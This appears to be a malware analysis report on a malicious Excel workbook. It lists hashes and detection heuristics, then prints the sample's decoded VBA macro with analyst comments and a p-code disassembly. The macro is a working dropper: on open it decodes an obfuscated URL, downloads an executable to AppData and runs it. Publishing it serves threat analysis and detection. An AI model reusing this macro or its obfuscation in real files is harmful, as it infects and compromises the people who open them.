Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ebd4be279ffeac60…

MALICIOUS

Office (OLE)

69.5 KB Created: 2020-05-09 08:46:00 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 58a8b51e7c69f75f563747eae7bc12fb SHA-1: 552c271a2f3457ea137cc52d669b2ff0b256741b SHA-256: ebd4be279ffeac609946977cd38d51331cad3238e36185828c183154f5e03f8f
276 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an Excel file containing a Workbook_Open VBA macro that uses the URLDownloadToFile API to download a second-stage payload. The macro attempts to save the payload to the AppData directory. The presence of the Workbook_Open macro together with the use of URLDownloadToFile is a strong indicator of downloader or dropper functionality.

Heuristics 8

  • ClamAV: Xls.Dropper.Agent-7783762-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7783762-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _
    ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk")
    acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10212 bytes
SHA-256: 1208bb92161f3d36c2bdc2f31280b7cd5b5e637472b7227dd4e076725e1b839a
Preview script
First 1,000 lines of the extracted script
' Module1: a standard (non-document) module; in the listing it holds only the empty stub Sub Bil.
Attribute VB_Name = "Module1"
' Empty stub: has no body and is not referenced anywhere else in the extracted source.
Sub Bil()

End Sub

' Document module for the workbook itself (the VB_Base GUID 00020819-... is Excel's
' Workbook class, i.e. ThisWorkbook, here renamed "YufjTbook"). VB_PredeclaredId = True
' marks the predeclared instance, which is what lets the Workbook_Open handler below
' run automatically when the file is opened with macros enabled.
Attribute VB_Name = "YufjTbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Win32 import of ShellExecuteA from shell32.dll, bound under a random-looking
' name so that "ShellExecute" only appears in the Alias clause. Called at the end
' of the downloader sub with the "open" verb to launch the dropped file.
Private Declare PtrSafe Function EPSiDEOXSw Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal EqRoAOwNzDe As Long, ByVal RPJcYvRqvsDGVrsBLGkzSm As String, _
ByVal FApUefdiSLTxKJ As String, ByVal ZegXxMEpWYtVbpzThUHi As String, ByVal EDgMe As String, ByVal QUuUgZspLiGyuGWmHvEcW As Long) As Long

' Win32 import of URLDownloadToFileA from urlmon, again under a random alias.
' Parameters follow the API: (pCaller, szURL, szFileName, dwReserved, lpfnCB).
' Called once in the downloader sub with the decoded URL and the %AppData% path.
Private Declare PtrSafe Function BmtAQrrGwzrPtXVDsM Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal DuHRBAooPXkMgLjBNBz As Long, ByVal tLIf As String, _
ByVal OZfcnEFbclJqTjPVpxnSNOMR As String, ByVal CvChH As Long, ByVal tJNPHhJoYTIdTKXjRQ As Long) As Long

' Downloader/dropper routine, invoked from Workbook_Open.
' Sequence: decode the payload file name, build its path under %AppData%,
' decode the download URL, fetch it with URLDownloadToFileA, then launch the
' file with ShellExecuteA. Only three of the six declared locals are used; the
' other three are padding. Both API return values are discarded, so a failed
' download still falls through to the execute step.
Sub DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX()
Dim EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As String   ' decoded download URL
Dim VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As String   ' decoded payload file name
Dim acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH As String   ' full destination path under %AppData%
Dim RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs As String   ' unused
Dim WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae As String   ' unused
Dim QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG As String   ' unused
' "fyf/sskk" -> Decrypt (reverse, then -1 per character) -> "jjrr.exe"
VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb = Decrypt("fyf/sskk")
' Destination path: %AppData%\jjrr.exe
acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH = Environ$("AppData") & "\" & VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb


' Decodes to the payload URL; defanged: hxxps://nilemixitupd[.]biz[.]pl/SILVER/COJHJHHGHVCDKNJKJ.exe
EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV = Decrypt("fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui")

' URLDownloadToFileA(NULL, url, localPath, 0, NULL) - HRESULT ignored
BmtAQrrGwzrPtXVDsM 0, EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV, acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, 0, 0
' ShellExecuteA(NULL, "open", localPath, "", NULL, vbNormalFocus) - runs the dropped file
EPSiDEOXSw 0, "open", acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH, "", vbNullString, vbNormalFocus
End Sub




' Auto-execute entry point: Excel runs this when the workbook is opened with
' macros enabled (the document's enable-content lure is there to get the user
' to allow that). It only delegates to the downloader sub above.
Sub Workbook_Open()

DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX
End Sub


' Junk/dead code: this function is never called from the extracted source and
' its return value is never assigned. The body stores arbitrary numeric and
' string literals into locals (including fractional values into a Byte and a
' Boolean, which VBA would coerce at run time) and never reads them again.
' The two undeclared names (qoxnwkqnhfshhimr, dhmpmrvyvrxwv) imply the module
' has no Option Explicit. As listed, two block Ifs are closed by a single
' End If, so this text would not compile as written; the function's most
' plausible purpose is signature/heuristic noise rather than logic.
Public Function mutiqueshed(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"   ' wildcard pattern for the Like test below
Dim be3a8c1f30f1ababb648e22b16fdc57d3 As Double
be3a8c1f30f1ababb648e22b16fdc57d3 = 242.162
Dim columnwall As Byte
columnwall = 114.429
Dim t0ea0a0840384a15e019665b2e996b72f As Long
t0ea0a0840384a15e019665b2e996b72f = 184.954
Dim n2b549c2e42dc58d564726b5780212aba As Double
n2b549c2e42dc58d564726b5780212aba = 185.115
dhmpmrvyvrxwv = ""
Dim m974e3e334b64ac13b6dec997fcabf21f As String
m974e3e334b64ac13b6dec997fcabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 19.227
Dim z2c55929d38494d4bf3ab6ba3dd15305c As Boolean
z2c55929d38494d4bf3ab6ba3dd15305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fbc0 As Double
b9d76f7072ca3da29e82e55579143fbc0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then   ' always True given the assignment just above
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function

' String decoder used for the file-name and URL literals in the downloader sub.
' Algorithm: reverse the input, then shift every character down by one code
' point (Chr(Asc(x) - 1)). The accumulator is named "AppData" purely as a
' decoy; it has nothing to do with the environment variable of that name.
' Note the parameter itself is reassigned (enc = StrReverse(enc)); since both
' callers pass string literals, nothing outside the function is affected.
Private Function Decrypt(enc)
    Dim x, v, AppData      ' x: current character, v: 1-based index, AppData: output buffer
    enc = StrReverse(enc)
    For v = 1 To Len(enc)
        x = Mid(enc, v, 1)
        AppData = AppData & Chr(Asc(x) - 1)
    Next
    Decrypt = AppData
End Function

' Worksheet document module (VB_Base GUID 00020820-... is Excel's Worksheet class);
' no code in this module in the extracted listing.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet document module (same Worksheet class GUID as Sheet1); no code in the extracted listing.
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet document module (same Worksheet class GUID as Sheet1); no code in the extracted listing.
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore__t236yey
' ===============================================================================
' Module streams (p-code disassembly). Note: the identifier names resolved below do not
' line up with the decompressed VBA source above (e.g. the routine with Workbook_Open's
' structure appears as id_0296, and the decoder with Decrypt's loop appears as
' UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open), while the string literals and control flow do
' match. This can be an identifier-table resolution artifact of the disassembler, but
' since a source/p-code mismatch is also what VBA stomping looks like, it is worth
' confirming explicitly rather than assuming either.
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' 	FuncDefn (Sub RPJcYvRqvsDGVrsBLGkzSm())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/YufjTbook - 6404 bytes
' Line #0:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function ZegXxMEpWYtVbpzThUHi Lib "OZfcnEFbclJqTjPVpxnSNOMR" (ByVal EDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal shell32.dll As String, ByVal BmtAQrrGwzrPtXVDsM As String, ByVal DuHRBAooPXkMgLjBNBz As String, ByVal tLIf As Long) As Long)
' Line #1:
' Line #2:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function CvChH Lib "acvNjuUjKmNbVCxdDEfJjNdVFnJmklPoIujmnBGvcBhFH" (ByVal tJNPHhJoYTIdTKXjRQ As Long, ByVal urlmon As String, ByVal DVBmKLPlJhtgBnJNVFilWTumNbvcxlpojnvcftYhjpKnrFBkyX As String, ByVal EGxGFtFkNbZtjHjhbvhjkkFTYhTDhgcfIklBDCVBNMkLoujggffddFV As Long, ByVal VBnmKlOUVFvBvOIoplJNmquxoHnmgTREsdCvBNjyukolplkjhnmnbvdftgberdasxcb As Long) As Long)
' Line #3:
' Line #4:
' 	FuncDefn (Sub RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs())
' Line #5:
' 	Dim 
' 	VarDefn WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae (As String)
' Line #6:
' 	Dim 
' 	VarDefn QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG (As String)
' Line #7:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #8:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #9:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #10:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #11:
' 	LitStr 0x0008 "fyf/sskk"
' 	ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001 
' 	St QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG 
' Line #12:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd mutiqueshed$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld QwetyhgfncmvlhpoikBNmVCXDFGNSzFYhWCxywBmtAUKMnBG 
' 	Concat 
' 	St Decrypt 
' Line #13:
' Line #14:
' Line #15:
' 	LitStr 0x0038 "fyf/KLKOLEDWIHIIKIKPD0SFWMJT0mq/{jc/eqvujyjnfmjo00;tquui"
' 	ArgsLd UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 0x0001 
' 	St WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae 
' Line #16:
' Line #17:
' 	LitDI2 0x0000 
' 	Ld WmKOLPkhrtYhNjMnCJLUsnQKmLolPuJNmHGVBtdFvbZxae 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall CvChH 0x0005 
' Line #18:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld burgerorgan 
' 	Ld bonusshoot 
' 	ArgsCall ZegXxMEpWYtVbpzThUHi 0x0006 
' Line #19:
' 	EndSub 
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' 	FuncDefn (Sub id_0296())
' Line #25:
' Line #26:
' 	ArgsCall RthJGDbmTwPvSlKlwqIsOyIOKWKMJjgfjduhcbcvs 0x0000 
' Line #27:
' 	EndSub 
' Line #28:
' Line #29:
' Line #30:
' 	FuncDefn (Public Function be3a8c1f30f1ababb648e22b16fdc57d3(columnwall, t0ea0a0840384a15e019665b2e996b72f, id_FFFE As Variant))
' Line #31:
' 	LitStr 0x0001 "*"
' 	Ld columnwall 
' 	Concat 
' 	LitStr 0x0001 "*"
' 	Concat 
' 	St n2b549c2e42dc58d564726b5780212aba 
' Line #32:
' 	Dim 
' 	VarDefn dhmpmrvyvrxwv (As Double)
' Line #33:
' 	LitR8 0xBE77 0x1A9F 0x452F 0x406E 
' 	St dhmpmrvyvrxwv 
' Line #34:
' 	Dim 
' 	VarDefn m974e3e334b64ac13b6dec997fcabf21f (As Byte)
' Line #35:
' 	LitR8 0x7EFA 0xBC6A 0x9B74 0x405C 
' 	St m974e3e334b64ac13b6dec997fcabf21f 
' Line #36:
' 	Dim 
' 	VarDefn b08576ffe41cb67690655f1261f410844 (As Long)
' Line #37:
' 	LitR8 0x0C4A 0x2B02 0x1E87 0x4067 
' 	St b08576ffe41cb67690655f1261f410844 
' Line #38:
' 	Dim 
' 	VarDefn z2c55929d38494d4bf3ab6ba3dd15305c (As Double)
' Line #39:
' 	LitR8 0xE148 0x147A 0x23AE 0x4067 
' 	St z2c55929d38494d4bf3ab6ba3dd15305c 
' Line #40:
' 	LitStr 0x0000 ""
' 	St b9d76f7072ca3da29e82e55579143fbc0 
' Line #41:
' 	Dim 
' 	VarDefn kqeepfyakmzwuediw (As String)
' Line #42:
' 	LitStr 0x000B "naiveremove"
' 	St kqeepfyakmzwuediw 
' Line #43:
' 	Dim 
' 	VarDefn flamesight (As Byte)
' Line #44:
' 	LitR8 0x3127 0xAC08 0x3A1C 0x4033 
' 	St flamesight 
' Line #45:
' 	Dim 
' 	VarDefn sweartrust (As Boolean)
' Line #46:
' 	LitR8 0xE560 0x22D0 0x79DB 0x4057 
' 	St sweartrust 
' Line #47:
' 	Dim 
' 	VarDefn prqhhqrabc (As Double)
' Line #48:
' 	LitR8 0x7CEE 0x353F 0x2A5E 0x405B 
' 	St prqhhqrabc 
' Line #49:
' 	Ld t0ea0a0840384a15e019665b2e996b72f 
' 	Ld n2b549c2e42dc58d564726b5780212aba 
' 	Like 
' 	Not 
' 	IfBlock 
' Line #50:
' 	Ld columnwall 
' 	St b9d76f7072ca3da29e82e55579143fbc0 
' Line #51:
' 	Dim 
' 	VarDefn enc (As Double)
' Line #52:
' 	LitR8 0x2B02 0x1687 0xBED9 0x404E 
' 	St enc 
' Line #53:
' 	Ld enc 
' 	LitR8 0xD2F2 0x624D 0xA810 0x4067 
' 	Ne 
' 	IfBlock 
' Line #54:
' 	Dim 
' 	VarDefn x (As Byte)
' Line #55:
' 	LitR8 0xDD2F 0x0624 0x9981 0x406A 
' 	St x 
' Line #56:
' 	Dim 
' 	VarDefn v (As Long)
' Line #57:
' 	LitR8 0xAC08 0x5A1C 0x7F64 0x406D 
' 	St v 
' Line #58:
' 	Dim 
' 	VarDefn AppData (As String)
' Line #59:
' 	LitStr 0x000C "fadzjgdilazu"
' 	St AppData 
' Line #60:
' 	EndIfBlock 
' Line #61:
' 	EndFunc 
' Line #62:
' Line #63:
' 	FuncDefn (Private Function UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open(StrReverse, id_FFFE As Variant))
' Line #64:
' 	Dim 
' 	VarDefn Chr
' 	VarDefn Asc
' 	VarDefn Sheet1
' Line #65:
' 	Ld StrReverse 
' 	ArgsLd Sheet2 0x0001 
' 	St StrReverse 
' Line #66:
' 	StartForVariable 
' 	Ld Asc 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StrReverse 
' 	FnLen 
' 	For 
' Line #67:
' 	Ld StrReverse 
' 	Ld Asc 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St Chr 
' Line #68:
' 	Ld Sheet1 
' 	Ld Chr 
' 	ArgsLd Workbook 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd Sheet3 0x0001 
' 	Concat 
' 	St Sheet1 
' Line #69:
' 	StartForVariable 
' 	Next 
' Line #70:
' 	Ld Sheet1 
' 	St UjkIkikJhHhDkfhfHffhUjfnffhfnhf_Open 
' Line #71:
' 	EndFunc 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes